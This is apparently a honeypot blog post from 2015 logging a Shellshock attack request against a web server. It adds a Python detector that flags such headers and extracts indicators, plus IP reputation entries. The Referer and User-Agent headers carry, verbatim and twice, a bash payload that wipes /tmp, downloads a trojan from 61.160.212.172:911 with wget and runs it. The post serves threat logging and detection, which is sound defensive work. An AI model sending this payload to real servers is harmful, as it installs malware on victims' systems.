Wednesday, 30 September 2015

61.161.130.241 - ChinaZ attempt via 61.160.212.172

BEGIN OF HTTP DATA:
2015-09-30 11:05:18
Source IP: 61.161.130.241
Country: CN RiskScore: 1 Malware: []
GET / HTTP/1.1
Host: 109.234.106.8
Referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Accept:*/*
User-Agent: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Connection:Keep-Alive
I did not think I would see that again :-)
java: Linux.Trojan.Agent FOUND
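As an added example (not code from the original post), a small Python detector for captures like the one above: it flags request headers whose value opens with the bash function-definition pattern that Shellshock abuses, and pulls the download URL and dropped file paths out of the trailing command as indicators for blocking and hunting. The sample request is re-typed from the capture; the function and constant names are my own.

```python
import re
from typing import Dict, List, Set
from urllib.parse import urlparse

# A Shellshock probe puts a bash function definition, "() { ... }", in a
# header value; a vulnerable bash runs whatever follows the closing brace
# once the CGI layer exports that header as an environment variable.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{.*?\}\s*;\s*(?P<tail>.*)$")
URL_RE = re.compile(r"https?://[^\s\"';]+")
DROP_RE = re.compile(r"/tmp/[\w.\-]+")

# Constructed sample input: the request headers from the honeypot capture,
# re-typed here so the detector can be run offline.
SAMPLE_REQUEST = """GET / HTTP/1.1
Host: 109.234.106.8
Referer: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Accept:*/*
User-Agent: () { :; }; /bin/bash -c "rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-tnci >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-tnci >> /tmp/Run.sh;echo /tmp/China.Z-tnci >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh"
Connection:Keep-Alive
"""


def scan_headers(raw_request: str) -> List[Dict]:
    """Return one finding per header whose value carries a Shellshock payload."""
    findings = []
    for line in raw_request.splitlines():
        name, sep, value = line.partition(":")
        if not sep or " " in name:  # request line or malformed header, skip
            continue
        match = SHELLSHOCK_RE.match(value)
        if not match:
            continue
        tail = match.group("tail")
        findings.append({
            "header": name.strip(),
            "command": tail.strip(),
            "urls": sorted(set(URL_RE.findall(tail))),
            "dropped": sorted(set(DROP_RE.findall(tail))),
        })
    return findings


def download_sources(findings: List[Dict]) -> Set[str]:
    """Collect host:port pairs the payloads fetch from, e.g. for an egress block list."""
    return {urlparse(u).netloc for f in findings for u in f["urls"]}


if __name__ == "__main__":
    hits = scan_headers(SAMPLE_REQUEST)
    for hit in hits:
        print(hit["header"], hit["urls"], hit["dropped"])
    print("download sources:", download_sources(hits))
```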

61.161.130[.]241

    Static Source: GeoIP data
  • Country: China
  • ASN: AS4837 CNCGROUP China169 Backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.161.130.241

61.160.212[.]172

    Static Source: GeoIP data
  • Country: China
  • ASN: AS23650 AS Number for CHINANET jiangsu province backbone
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • comment:This entry alone does not indicate a threat, please check the link
  • Reference: https://isc.sans.edu/api/ip/61.160.212.172